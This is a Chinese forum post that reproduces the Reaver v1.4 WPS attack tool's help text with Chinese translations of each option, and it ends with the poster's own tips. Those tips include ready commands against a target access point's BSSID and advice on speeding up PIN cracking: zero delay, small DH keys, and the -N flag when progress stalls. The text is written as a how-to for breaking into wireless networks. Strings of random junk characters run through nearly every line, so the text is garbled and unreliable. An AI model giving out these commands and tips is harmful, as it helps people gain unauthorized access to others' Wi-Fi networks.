少校
- 注册时间
- 2012-2-5
- 金币
- 2429 个
- 威望
- 3 个
- 荣誉
- 1 个
累计签到:193 天 连续签到:1 天 [LV.200]无线新星
|
Reaver v1.4 WiFi Protected Setup Attack Tool1 j. E- _5 D3 r# l7 G+ q# J+ z
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
3 v& ]1 G- Y" { n# a* I; {
' o6 ~, g7 v! }8 r4 e i
G' v2 ^; t: g6 |/ E2 p1 r9 bRequired Arguments:
1 h* B8 p( O' E& C -i, --interface=<wlan> Name of the monitor-mode interface to use
2 K. ~; D. s5 l0 J6 |! o 网卡的监视接口,通常是mon0+ p/ G4 D' M+ e, \! @4 S: @
-b, --bssid=<mac> BSSID of the target AP
0 X# Q% D# u% L# _+ l1 b6 t! W9 K AP的MAC地址0 P$ j I1 i o
6 a% k; u: T0 d `- v& H0 M
6 ]2 H v, ?! r2 B5 p- S
Optional Arguments:# I$ N y5 M6 Z- k0 X& S% }+ P
-m, --mac=<mac> MAC of the host system
3 S/ b7 d1 f9 B# O 指定本机MAC地址,在AP有MAC过滤的时候需要使用
) x8 [7 K. M" H3 x -e, --essid=<ssid> ESSID of the target AP
# k8 `2 T/ h6 A: }$ N( ]3 I2 z 路由器的ESSID,一般不用指定+ g) \4 o# Z/ k" e1 i9 b$ j
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
( q% [: T( o3 z6 a- ] 信号的频道,如果不指定会自动扫描+ Q) W& C; {" q( v' e
-o, --out-file=<file> Send output to a log file [stdout]4 K+ J4 b: h q$ l
标准输出到文件9 p7 `/ Q. r+ P! P3 @: _
-s, --session=<file> Restore a previous session file
/ |/ v: |+ K. \7 x9 [9 M 恢复进程文件
; [& D5 b2 D5 Q" J8 v+ h -C, --exec=<command> Execute the supplied command upon successful pin recovery
7 W( H- I5 @- F. i8 U/ P/ w pin成功后执行命令
$ s) Q7 P9 T, L. D8 D l -D, --daemonize Daemonize reaver6 S0 H- Q( S' v" U9 ?: n6 @
设置reaver成Daemon/ s p3 {% o! W$ A3 J
-a, --auto Auto detect the best advanced options for the target AP! z- F( \, I, B# c/ [" l
对目标AP自动检测高级参数) u+ P' a1 N& B+ _/ v' @
-f, --fixed Disable channel hopping5 R8 Z/ W# f }" V
禁止频道跳转/ @& C5 s/ r) V. ~% x
-5, --5ghz Use 5GHz 802.11 channels
4 ^7 O3 ]7 p( s; i 使用5G频道
1 ]" a4 k. s, j -v, --verbose Display non-critical warnings (-vv for more)% e6 A6 k& y$ O( a4 ^7 Q
显示不重要警告信息 -vv 可以显示更多
, D& {! H3 K$ C0 T' I -q, --quiet Only display critical messages' s& l; r& k$ i* D6 d7 c( B* o
只显示关键信息7 L2 W( S, m# ?
-h, --help Show help; q# }6 M. h4 W# V( r2 s3 w) F3 S
显示帮助% B2 L+ d$ Z# r, S
: M- z* I3 {2 S) k; T) e
4 c. _/ O4 }2 ?0 n1 P
Advanced Options:
4 q$ K# W) L& Q4 W4 k' Q( |$ t7 X- g' J -p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
+ Q0 m K$ p! @; [1 B+ U5 Y+ { 直接读取psk(本人测试未成功,建议用网卡自带软件获取) `! P- [; W5 N4 k( t7 M: G* m- b$ }
-d, --delay=<seconds> Set the delay between pin attempts [1]4 F# t0 @7 \3 s
pin间延时,默认1秒,推荐设0, K' ^2 R* G0 g4 x% m) M. X
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]" Z, E- o$ x& v2 d# D
AP锁定WPS后等待时间4 g' o+ q+ \! ~
-g, --max-attempts=<num> Quit after num pin attempts+ M( E/ l$ W% X
最大pin次数
% U9 D0 r N# P" W$ M- n2 c4 W. o6 X -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]( B: l2 U1 }, E: \3 r& S% c
10次意外失败后等待时间,默认0秒
# [7 ~) a7 r$ e8 V8 j -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
2 e4 [ N, y3 i 每x次pin后等待y秒5 l7 j/ B2 \3 P! T: K2 U
-t, --timeout=<seconds> Set the receive timeout period [5]
/ h# O; K9 ?/ Y6 k 收包超时,默认5秒* H6 _& b1 G' H9 ?/ _! c
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
4 X" N) B- G, v M5/M7超时,默认0.2秒; I; T6 z8 W2 Y0 f9 Z% r/ U
-A, --no-associate Do not associate with the AP (association must be done by another application)
6 E9 a8 v1 p: h2 F9 d+ Z* @ 不连入AP(连入过程必须有其他程序完成)
0 D7 q$ B% w' q% b* G0 G) w -N, --no-nacks Do not send NACK messages when out of order packets are received
# G7 F# Q- Y- l( N6 \$ h 不发送NACK信息(如果一直pin不动,可以尝试这个参数)
- t$ l6 P* f9 J! |8 C" @* R -S, --dh-small Use small DH keys to improve crack speed3 e7 {% m' }$ }& ?7 t( Q0 ^ x
使用小DH关键值提高速度(推荐使用)* ]" J& T8 {( Q9 l6 t
-L, --ignore-locks Ignore locked state reported by the target AP
1 G+ R% b' \0 f" h 忽略目标AP报告的锁定状态
) @6 x; ]6 p# {. J -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet4 ?/ r6 W: o. V" F( z H
每当收到EAP失败包就终止WPS进程. G' ~. ?6 n: s+ ^
-n, --nack Target AP always sends a NACK [Auto]6 J$ Z/ G. k+ X
对目标AP总是发送NACK,默认自动9 U/ ^, x/ k( ^7 M1 Z7 i
-w, --win7 Mimic a Windows 7 registrar [False]
4 S* {: b$ P ^. j2 p 模拟win7注册,默认关闭
( X F4 e* ^' d5 N. \: `- m+ L; P. ?' J+ p
------个人心得---------------------------------------------------------5 z3 A8 h6 K: v6 D5 m0 F0 p1 G
, k7 S* _* m$ t4 a
对一个ap刚开始pin的时候打开-vv参数,如果顺利,就中断,然后改成-v继续pin,反正进度是可以保存的8 T# R4 s% Q* z
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S
6 K+ [+ y- A0 m. C- \- Y0 a1 a. ?8 Y* a }
如果一直pin不动,尝试加-N参数/ s( Y$ {" f9 J; f7 o' i) X
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S - |
评分
-
2
查看全部评分
-
|